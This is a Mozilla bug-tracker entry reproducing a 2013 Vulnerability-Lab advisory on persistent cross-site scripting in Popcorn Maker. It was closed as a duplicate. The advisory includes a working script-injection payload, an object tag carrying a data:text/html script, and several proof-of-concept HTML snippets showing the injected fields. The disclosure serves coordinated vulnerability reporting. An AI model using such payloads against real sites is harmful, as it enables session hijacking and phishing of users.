Multiple Persistent Vulnerabilities

RESOLVED DUPLICATE of bug 866026

Status

Webmaker
Popcorn Maker
RESOLVED DUPLICATE of bug 866026
5 years ago
4 years ago

People

(Reporter: curtisk, Assigned: mgoodwin)

Tracking

(Blocks: 1 bug)

unspecified
Bug Flags:
sec-bounty -

Details

(Whiteboard: [site:popcorn.webmaker.org][wsec-xss])

Attachments

(5 attachments)

Date: Mon, 10 Jun 2013 20:28:04 +0100
From: Vulnerability Lab <admin@vulnerability-lab.com>
To: Mozilla Security <security@mozilla.org>
Subject: Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities
-----//-----
Title:
======
Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities


Date:
=====
2013-06-10


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=966


VL-ID:
=====
966


Common Vulnerability Scoring System:
====================================
3.2


Introduction:
=============
Popcorn adds interactivity and context to online video, pulling the rest
of the web right into the action in real time.
Popcorn lets users link social media, news feeds, data visualizations
and other content directly to moving images.
The result is a new form of multimedia storytelling that lives and
breathes more like the web itself: interactive, social,
and unique each time. Popcorn is the result of ongoing collaboration
between filmmakers, developers and webmakers. Together
we explore how modern browser technologies like HTML5 can reshape moving
images online.

Popcorn Maker makes it easy to enhance, remix and share web video. Use
your web browser to combine video and audio
with content from the rest of the web — from text, links and maps to
pictures and live feeds.

(Copy of the Homepage: https://popcorn.webmaker.org &
https://mozillalabs.com/en-US/Popcorn/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple
persistent web vulnerabilities in the Mozilla Popcorn Maker (Webmaker)
Application.


Report-Timeline:
================
2013-06-06: Researcher Notification & Coordination
2013-06-10: Vendor Notification
2013-00-00: Vendor Response/Feedback
2013-00-00: Vendor Fix/Patch
2013-00-00: Public Disclosure


Status:
========
Unpublished


Affected Products:
==================
Mozilla
Product: Popcorn Maker (Webmaker) 2013 Q2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple persistent input validation web vulnerabilities are detected in
the official Mozilla Popcorn Maker (WebMaker) Web Application.
The vulnerability allows an attacker to inject own malicious script code
in the vulnerable module on application side (persistent).

The persistent input validation vulnerabilities are located in the
events und layer modules when processing to add `Text`, `Link URL`,
`Image URL`, `video-container name` with malicious persistent script
code (js/html). The script code will be executed when the website
is processing to load the malicious manipulated web context of the input
ago.

Exploitation of the vulnerabilities requires no privileged application
user account but low or medium required user interaction.
Successful exploitation results in persistent session hijacking of
mozilla accounts, persistent phishing, persistent external malware loads
or redirects and persistent module web context manipulation.

Vulnerable Service(s):
[+] Mozilla Corp - Popcorn Maker (Webmaker.org - Mozilla Labs)

Vulnerable Module(s):
[+] Events
[+] Layer

Vulnerable Parameter(s):
[+] Text
[+] Link URL
[+] Image URL
[+] Video Container Name

Affected Section(s):
[+] Index Basic - Listing


Proof of Concept:
=================
The persistent input validation web vulnerabilities can be exploited by
remote attackers without privilege application user account
with low or medium required user interaction. For demonstration or
reproduce ...


--- Vulnerable Application Modules & Input Fields ---

Module: Events > Text
Input Fields: Text & Link URL

Module: Events > Image
Input Fields: Image URL & Link URL

Module: Events > Popup
Input Fields: Text & Link URL

Module: Layer > Listing
Input Fields: video-container name

Reference(s):
https://popcorn.webmaker.org/templates/basic/


Payload:
<object data="data:text/html,<script>alert(1337)</script>"></object>--benDE


PoC: Property-name (Text) & Link URL

<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(1337)&lt;/script&gt;"&gt;&lt;/object&gt;</textarea>
<div style="top: 105%; left: 50%;" class="butter-tooltip
shift-enter-tooltip-1370021564314 tooltip-no-hover">
Press Shift+Enter for a new line.</div></fieldset><fieldset
style="position: relative;" class="trackevent-property default input">
<label class="property-name">Link URL</label>
<input value="<object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;
data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)
</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;
data:text/html,<script>alert(1337)</script>&quot;></object>"
data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip
text-link-tooltip1370021564317
tooltip-no-hover">Links will be clickable when shared.</div></fieldset>


PoC: trackevent-property textarea - POP!

<fieldset style="position: relative;" class="trackevent-property textarea">
<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">Pop! &lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(1337)&lt;/script&gt;"&gt;&lt;/object&gt;</textarea>


PoC: linkUrl & text

<label class="property-name">Link URL</label>
<input value="<object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;
data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)
</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;data:
text/html,<script>alert(1337)</script>&quot;></object>"
data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip
text-link-tooltip1370021564317
tooltip-no-hover">Links will be clickable when shared.</div></fieldset>


Solution:
=========
Restrict the input fields with a secure char filter and parse the input
and output listing in the application.


Risk:
=====
The security risk of the persistent input validation web vulnerabilities
are estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any
vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com -
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or
support@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory






-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com
assigned to mgoodwin for verification
https://wiki.mozilla.org/Security/Web_Bug_Rotation#Web_Bug_Verification
Assignee: nobody → mgoodwin
(Assignee)

Updated

5 years ago
Status: UNCONFIRMED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → DUPLICATE
Whiteboard: [reporter-external][verif?] → [site:popcorn.webmaker.org][wsec-xss]
Duplicate of bug: 866026

Comment 8

5 years ago
Hello Mark Goodwin,
the issue has been marked as duplicate in our database after you provided the details. The issue will be deleted from our upcomings and ensure the real researcher get the full credits for reporting the issue. 

Thanks Mark. We appreciate your cooperation and web vulnerability coordination.
~Benjamin Kunz Mejri
Blocks: 943111
Group: websites-security
Flags: sec-bounty-
You need to log in before you can comment on or make changes to this bug.